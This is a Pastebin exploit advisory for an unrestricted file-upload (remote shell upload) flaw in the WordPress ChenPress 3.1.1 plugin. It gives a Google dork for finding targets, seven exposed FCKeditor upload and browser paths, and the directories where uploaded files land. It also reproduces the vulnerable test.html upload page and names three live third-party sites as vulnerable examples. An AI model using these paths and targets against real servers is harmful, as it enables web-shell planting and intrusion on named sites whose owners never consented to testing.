API tools faq
paste
KingSkrupellos

WordPress ChenPress Plugins 3.1.1 Remote Shell Upload Vuln

KingSkrupellos
Dec 19th, 2018
107
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 6.34 KB | None | 0 0
raw download clone embed print report
  1. #################################################################################################
  2.  
  3. # Exploit Title : WordPress ChenPress Plugins 3.1.1 Remote Shell Upload Vulnerability
  4. # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
  5. # Date : 20/12/2018
  6. # Vendor Homepage : wordpress.org ~ groups-beta.google.com/group/ChenPress
  7. # Software Download Link : groups.google.com/group/ChenPress/attach/de5f7cc401d8c608/chenpress_3.1.1.zip?part=2
  8. # Script Owner Email : [email protected] ~ W. Chen
  9. # Tested On : Windows and Linux
  10. # Category : WebApps
  11. # Version Information : 3.1.1
  12. # Exploit Risk : Medium
  13. # Google Dorks : inurl:''/wp-content/plugins/chenpress/''
  14. # Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ]
  15. + CWE-434: Unrestricted Upload of File with Dangerous Type
  16. # Visit Web Security Blog and Forum : cyberizm.org [ Team ] ~ ayarsecurity.com [ Friend ]
  17.  
  18. #################################################################################################
  19.  
  20. # Exploit :
  21.  
  22. /wp-content/plugins/chenpress/fckeditor/editor/filemanager/browser/mcpuk/browser.html
  23.  
  24. /wp-content/plugins/chenpress/FCKeditor/editor/filemanager/upload/test.html
  25.  
  26. /wp-content/plugins/chenpress/chenpress/FCKeditor/editor/filemanager/upload/test.html
  27.  
  28. /wp-content/plugins/chenpress/chenpress/FCKeditor/editor/filemanager/browser/default/browser.html
  29.  
  30. /wp-content/plugins/chenpress/chenpress/FCKeditor/editor/filemanager/browser/default/connectors/test.html
  31.  
  32. /wp-content/plugins/chenpress/chenpress/FCKeditor/editor/filemanager/browser/default/frmupload.html
  33.  
  34. /wp-content/plugins/chenpress/chenpress/FCKeditor/editor/filemanager/browser/mcpuk/frmupload.html
  35.  
  36. # Directory File Path :
  37.  
  38. /wp-content/plugins/chenpress/UserFiles/File/.....
  39.  
  40. /wp-content/uploads/.....
  41.  
  42. /wp-content/uploads/[YEAR]/[MONTH]/.....
  43.  
  44. #################################################################################################
  45.  
  46. Vulnerable File Code : /test.html
  47.  
  48. <!--
  49. * FCKeditor - The text editor for internet
  50. * Copyright (C) 2003-2005 Frederico Caldeira Knabben
  51. *
  52. * Licensed under the terms of the GNU Lesser General Public License:
  53. * http://www.opensource.org/licenses/lgpl-license.php
  54. *
  55. * For further information visit:
  56. * http://www.fckeditor.net/
  57. *
  58. * "Support Open Source software. What about a donation today?"
  59. *
  60. * File Name: test.html
  61. * Test page for the "File Uploaders".
  62. *
  63. * File Authors:
  64. * Frederico Caldeira Knabben ([email protected])
  65. -->
  66. <html>
  67. <head>
  68. <title>FCKeditor - Uploaders Tests</title>
  69. <script language="javascript">
  70.  
  71. function SendFile()
  72. {
  73. var sUploaderUrl = cmbUploaderUrl.value ;
  74.  
  75. if ( sUploaderUrl.length == 0 )
  76. sUploaderUrl = txtCustomUrl.value ;
  77.  
  78. if ( sUploaderUrl.length == 0 )
  79. {
  80. alert( 'Please provide your custom URL or select a default one' ) ;
  81. return ;
  82. }
  83.  
  84. eURL.innerHTML = sUploaderUrl ;
  85. txtUrl.value = '' ;
  86.  
  87. frmUpload.action = sUploaderUrl ;
  88. frmUpload.submit() ;
  89. }
  90.  
  91. function OnUploadCompleted( errorNumber, fileUrl, fileName, customMsg )
  92. {
  93. switch ( errorNumber )
  94. {
  95. case 0 : // No errors
  96. txtUrl.value = fileUrl ;
  97. alert( 'File uploaded with no errors' ) ;
  98. break ;
  99. case 1 : // Custom error
  100. alert( customMsg ) ;
  101. break ;
  102. case 10 : // Custom warning
  103. txtUrl.value = fileUrl ;
  104. alert( customMsg ) ;
  105. break ;
  106. case 201 :
  107. txtUrl.value = fileUrl ;
  108. alert( 'A file with the same name is already available. The uploaded file has been renamed to "' + fileName + '"' ) ;
  109. break ;
  110. case 202 :
  111. alert( 'Invalid file' ) ;
  112. break ;
  113. case 203 :
  114. alert( "Security error. You probably don't have enough permissions to upload. Please check your server." ) ;
  115. break ;
  116. default :
  117. alert( 'Error on file upload. Error number: ' + errorNumber ) ;
  118. break ;
  119. }
  120. }
  121.  
  122. </script>
  123. </head>
  124. <body>
  125. <table cellSpacing="0" cellPadding="0" width="100%" border="0" height="100%">
  126. <tr>
  127. <td>
  128. <table cellSpacing="0" cellPadding="0" width="100%" border="0">
  129. <tr>
  130. <td nowrap>
  131. Select the "File Uploader" to use:<br>
  132. <select id="cmbUploaderUrl" name="Select1">
  133. <option selected value="asp/upload.asp">ASP</option>
  134. <option value="aspx/upload.aspx">ASP.Net</option>
  135. <option value="php/upload.php">PHP</option>
  136. <option value="">(Custom)</option>
  137. </select>
  138. </td>
  139. <td nowrap>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</td>
  140. <td width="100%">
  141. Custom Uploader URL:<BR>
  142. <input id="txtCustomUrl" style="WIDTH: 100%; BACKGROUND-COLOR: #dcdcdc" disabled type="text">
  143. </td>
  144. </tr>
  145. </table>
  146. <br>
  147. <table cellSpacing="0" cellPadding="0" width="100%" border="0">
  148. <tr>
  149. <td noWrap>
  150. <form id="frmUpload" target="UploadWindow" enctype="multipart/form-data" action="" method="post">
  151. Upload a new file:<br>
  152. <input type="file" name="NewFile"><br>
  153. <input type="button" value="Send it to the Server" onclick="SendFile();">
  154. </form>
  155. </td>
  156. <td style="WIDTH: 16px">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</td>
  157. <td vAlign="top" width="100%">
  158. Uploaded File URL:<br>
  159. <INPUT id="txtUrl" style="WIDTH: 100%" readonly type="text">
  160. </td>
  161. </tr>
  162. </table>
  163. <br>
  164. Post URL: <span id="eURL">&nbsp;</span>
  165. </td>
  166. </tr>
  167. <tr>
  168. <td height="100%">
  169. <iframe name="UploadWindow" width="100%" height="100%" src="../../fckblank.html"></iframe>
  170. </td>
  171. </tr>
  172. </table>
  173. </body>
  174. </html>
  175.  
  176. #################################################################################################
  177.  
  178. # Example Vulnerable Sites =>
  179.  
  180. [+] citizennetmom.com/wp-content/plugins/chenpress/chenpress/FCKeditor/editor/filemanager/upload/test.html
  181.  
  182. [+] arqueixal.com/blog/wp-content/plugins/chenpress/fckeditor/editor/filemanager/browser/mcpuk/browser.html
  183.  
  184. [+] ftp.unicauca.edu.co/cuentas/.cuentasbajadas29092009/comunicacionsocial/wp-content/plugins/
  185. chenpress/FCKeditor/editor/filemanager/browser/mcpuk/browser.html
  186.  
  187. #################################################################################################
  188.  
  189. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  190.  
  191. #################################################################################################
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!